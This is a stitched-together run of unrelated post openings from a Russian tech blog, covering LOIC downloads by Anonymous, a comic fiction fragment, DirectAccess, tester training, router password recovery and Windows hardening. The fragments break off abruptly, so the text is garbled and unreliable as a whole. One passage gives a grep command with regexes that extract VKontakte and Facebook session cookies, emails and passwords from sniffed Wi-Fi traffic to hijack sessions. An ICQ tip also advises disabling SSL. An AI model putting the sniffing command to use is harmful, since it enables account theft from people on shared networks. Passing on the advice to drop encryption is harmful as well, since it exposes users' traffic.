Как известно, для проведения DDoS-атаки на сайты Mastercard, Visa, Paypal и проч. многие участники группировки Anonymous используют программу LOIC (Low Orbit Ion Cannon), написанную на C# и изначально предназначенную для стресс-тестирования сайтов. Эта же программа раньше использовалась для DDoS-атак на сайты церкви сайентологии и веб-сайт RIAA (в октябре 2010 года)

Примечательный факт: с 8 по 10 декабря 2010 года клиентскую версию этой программы скачали около 30 000 раз при том, что общее количество скачиваний за всё время её существования составляет примерно 50 000. Большинство скачиваний в последние дни идёт из США (10000 скачиваний), но неожиданный интерес к стресс-тестированию сайтов проявили также пользователи из Великобритании (3200), Германии, Франции, Голландии, Испании и России (у каждой из этих стран — от 1000 до 2000 скачиваний).

Толчок. За ним ещё один, сильнее. Вот и всё. Перед глазами проносились альпийские луга, и девушка в бежевом сарафане, игриво крутя в точёных ручках кружевной зонтик проносилась мимо тоже. Проносилась, не сбавляя скорости, несмотря на то, что я тянул к ней свои менее точенные, но крепкие ручонки, а также жестами и мимикой изображал, в меру сил своих, какой всесторонний кундюшок её может ожидать, раскинь она мне руки навстречу (ну или ещё что раскинь).
Но случилось что случилось, и лишь ловко выхваченный зонтик из её, кстати, не только точённых но и цепких рук, немного оттенял розовыми тонами последние секунды моего пробуждения и согревал разбитое сердце (без зонтика, закрывающего её шевелюру, девушка оказалась на поверку немного, мягко говоря, плешиватой). Открыв глаза я, как то не странно, увидел себя не посреди развалин Ниигаты, и сразу отринул сейсмическую природу толчков. Немного отлегло. Перестал кричать – «Покинуть корабль!». С укором взглянул на начальника отдела трясущего меня за плечо. Который, вместо извинений принёс мне весть, что нас с ним ожидают у директора, для постановки одного маленького, но очень ответственного задания. Не приняв его слова близко к сердцу, я несколько раз пытался вернуться к своей плешивой искусительнице, но начальник продолжал проявлять чудеса настойчивости. Пришлось идти.

Хочу поділитися досвідом по темі звуку в Windows 7.
Насправді все не так погано, як спочатку здається, і я вам зараз це продемонструю.

В предыдущей части, посвященной DirectAccess, я рассмотрел транзитные технологии, обеспечивающие взаимодействие по IPv6 в среде IPv4, IPsec over IPv6 и модели доступа DA-клиентов к корпоративным ресурсам и остановился на таблице разрешения имен NRPT. Напомню, что NRPT используется только в том случае, когда DA-клиент находится в Интернете, или, иными словами, за пределами корпоративной сети. Соответственно, существует алгоритм, позволяющий DA-клиенту определить свое местоположение относительно корпоративной сети. Давайте рассмотрим этот алгоритм.

На форуме тестировщиков и в блогах часто появляются вопросы: с чего начинать тестировщику, который только-только выбрал свою стезю?

С одной стороны, сейчас много курсов в этой области, которые проводятся на базе портала Software-Testing.Ru, УЦ Luxoft, EPAM Systems и т.д.
С другой стороны, начинающему тестировщику далеко не всегда нужны курсы. Если вы ещё не знаете, в каком направлении развиваться, какие области интересны, какие знания хочется получать – то о каких курсах идёт речь? А комплексного ВУЗовского образования для тестировщиков в СНГ пока что нет… В итоге, многие люди не могут быстро «влиться» в профессию, найти направление для развития и понять, «что и как надо изучать для быстрого старта?».

Поэтому, я составила инструкцию для начинающих тестировщиков или людей, которые только выбрали себе эту область деятельности, и снабдила её максимумом ссылок, чтобы информацию не приходилось собирать по крупицам. Надеюсь, что эта инструкция поможет Вам в выбранном начинании.

Итак, 7 шагов от чайника к тестировщику.

Шалом, Хабр! Таки отважился представить тебе своё детище — результат непосильных трудов и недосыпания. Что же оно такое?

Представьте, что вы решили купить какой-либо девайс. Полистав обзоры, нашли несколько кандидатов на роль будущей покупки. Сходили на Маркет, прочитали десяток-другой однотипных отзывов — надоело. Сходили на форум, скажем, iXBT — на пятой странице флейма отчаялись узнать что-либо полезное. Подождите, не совершайте покупку вслепую! Возможно, вам сможет помочь Просконс.

Бывает ситуация, когда вы уже пару лет пользуетесь интернетом через свой роутер и, что естественно, забыли или потеряли пароль. Тут в голову приходит мысль приобрести новый девайс, вы сломя голову идете в магазин, покупаете, приносите домой и… понимаете что пароля нигде нет. Но как любой мыслящий человек вы понимаете что маршрутизатор все помнит, осталось только его убедить рассказать его. Можно было бы проверить его в настройках роутера, но, к сожалению, этот способ подходит не для всех моделей. Я вам расскажу об универсальном способе узнать пароль.

Вам понадобятся:
1) Ваш маршрутизатор
2) Патч-корд (обычный, не кросс)
3) Компьютер с Linux на борту.

   Начнем, пожалуй, с того, что производители многих материнских плат премимум сегмента комплектуют их встроенными Wi-Fi модулями. Из тех, что мне встречались — это были в основном материнские платы производства Asus и Asrock.
   На днях мне отдали «на детальки» Asus P5N32 SLI Premium.

В прошлой заметке мы рассматривали некоторые аспекты тюнинга роутера под Linux, предназначенного для работы в условиях высоких нагрузок: Linux под нагрузкой. Маршрутизатор, NAT-сервер Теперь же речь пойдет о шейперах.

На видео показан угон сессии вконтакте.ру, который почему-то до сих пор не использует авторизацию с https и передает пароли открытым текстом.
Дамп трафика собирается программой kismac в формате libpcap и параллельно парсится grep-ом с использованием регулярных выражений, что позволяет в реальном времени выводить на экран все интересующие куки и пароли. При этом не используется никаких анализаторов пакетов.

regexp для перехвата вконтакте.ру:

tail -F pcap.файл | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+»

для фейсбука:

c_user=[0-9]+|sid=[0-9]{1,5}|xs=[0-9a-f]{32}

Аналогичная конструкция будет работать и с дампом собранным с помощью airdump-ng.

Многие пользователи неофициальных клиентов ICQ не могут выйти в онлайн по протоколу ICQ. Причиной этому неверно выставленный сервер подключения. Происходят смены DNS серверов и многие их них недоступны, либо заблокированы.

Данная ошибка поправлена для Adium в новой версии. Пользователи R&Q, Miranda IM, Pidgin (новая версия) и многих других альтернативных клиентов так же могли столкнуться с такой проблемой.

Решение — установить сервер подключения "login.icq.com". Если это не помогает, то "64.12.202.116". Также заменить сервера подключения в настройках:
slogin.oscar.aol.com на slogin.icq.com
ars.oscar.aol.com на ars.icq.com
И лучше всего отключить SSL.

Проект SeeMap.ru — Городские Маршруты. За 9 месяцев, что прошли с моего прошлого поста, была проделана огромная работа. Теперь поиск маршрутов работает в 15 городах и ещё более 5-и находятся в стадии добавления. Также хочу рассказать о 3-х интересных виджетах для сайтов!

Разрешите немного с вами познакомиться. Зовут меня Алексей, представляю я на Хабре компанию ООО «Сэнюэл» (Sanuel). И в данном посте я бы хотел немного рассказать о том, чем мы занимаемся, и о чем я буду писать на Хабре. Заранее прошу прощения, если топик получится рекламным (не представляю, как можно рассказать о себе, своих продуктах, избежав рекламы).

С 2004-го года мы разрабатываем программные продукты (только для стран СНГ) для управления личными финансами. Уверен, тема эта интересна большому кругу людей (а если Вас это не интересует – обязательно прочтите следующий мой пост, где я постараюсь объяснить, почему так важно заниматься контролем своих финансов, что это реально дает). Постараюсь писать здесь только интересные и полезные заметки.

Чуть ниже Вы узнаете о линейке наших программ под названием Family. Данный продукт достаточно известен на рынке СНГ, и если Вы о нем еще не слышали, уверен, Вам он должен понравиться. Постараюсь писать кратко и по делу!

Еще давно очень многих интересовал один вопрос: «Эта программа занимает всего 100 кб, что за музыку она воспроизводит? Как это работает?»

Так вот, называется это чудо – Трекерная музыка. И что самое главное – она занимает очень мало места, в отличие от .mp3 или .wav. В современных популярных ОС трекерные файлы (MOD, XM, S3M, IT и пр.) проигрываются большинством медиаплееров, например, Winamp, VLC, Amarok, Audacious и другими.

Скачать такую музыку можно, например отсюда — keygenmusic.net, или отсюда www.modarchive.org. Это отнюдь не единственные ресурсы, стоит только обратиться к поиску.

Для того, чтобы воспроизвести такую музыку в своей программе, нам потребуется минимальное знание C++, а также minifmod, доступный в исходниках. Как заявляют разработчики, minifmod добавит всего 50 кб к вашему exe-файлу (без учета сжатия).

Прошло уже больше месяца после опубликования первого поста. Вняв советам хабравчан, решили сделать мастер для создания загрузочной флэшки.

Убрать его встроенным способом нельзя.
Он прикреплен к нижнему краю пользовательского экрана.
У него активная анимация.

Явный претендент на самое раздражающее UI-нововведение года.

P. S. Писать по поводу можно «ответственному за ЖЖ».

P. P. S. Он отписался.

P. P. P. S. А вот и непосредственно ответственный товарищ.

Казалось бы, не так давно я представлял Хабру свой проект.
Откликнулось много людей, некоторые пришли и оставили свой след в исходниках и истории коммитов, некоторые исчезли, кто-то все еще с нами.
Я хочу выразить всем им свою благодарность, потому что без них у меня вряд ли что-нибудь получилось.
А сегодня я наконец выпускаю альфа-версию проекта.

Под катом вас ждет много интересного, а сейчас дохабракатный мотивационный скриншот:

Аномальная жара прошедшего лета наверняка запомнится многим из нас неприятностями, которые она вызвала в работе с разнообразной компьютерной техникой и прочим высокотехнологичным оборудованием. У кого-то крайне высокую температуру не выдержал домашний компьютер, у кого-то — ноутбук, а у кого-то наверное были проблемы и посерьезней, вроде выхода из строя разнообразного коммуникационного сетевого оборудования, заставившие в прямом смысле попотеть во время решения той или иной проблемы.

Меня этот рок тоже не обошел стороной, и в середине августа мой прослуживший верой и правдой ASUS eee pc 1101ha стал натужно подвывать своим единственным кулером, соглашаясь на время замолчать лишь в ответ на загадочные для окружающих постукивания по его корпусу и прочие «шаманские» пассы. На работоспособности это абсолютно не сказывалось, но доставляло определенные неудобства, в результате чего спустя практически месяц я все-таки решился на попытку устранить неисправность собственными руками.

Недавно прочитал топики "Windows-компьютер без антивирусов" и "Настройка групповых политик ограниченного использования программ в Windows 7"… И подумал «А ведь не мало мелких и средних компаний используют Windows XP Home Edition, а там такие трюки не прокатят.» Поэтому сегодя хочу поделиться, как я настраивал Windows XP Home Edition, чтобы не использовать антивирусы, а точнее свести к минимуму вероятность заражения.

Прочитав статью Windows-компьютер без антивирусов, я загорелся такой идеей обеспечения безопасности и решил попробовать сделать у себя так же.

Поскольку у меня стоит Windows 7 Professional, первой идеей оказалось использование AppLocker'a, однако быстро выяснилось, что работать в моей редакции винды он не хочет, и требует Ultimate или Enterprise. В силу лицензионности моей винды и пустоты моего кошелька, вариант с AppLocker'ом отпал.

Следующей попыткой стала настройка групповых политик ограниченного использования программ. Поскольку AppLocker является «прокачанной» версией данного механизма, логично попробовать именно политики, тем более они бесплатны для пользователей Windows :)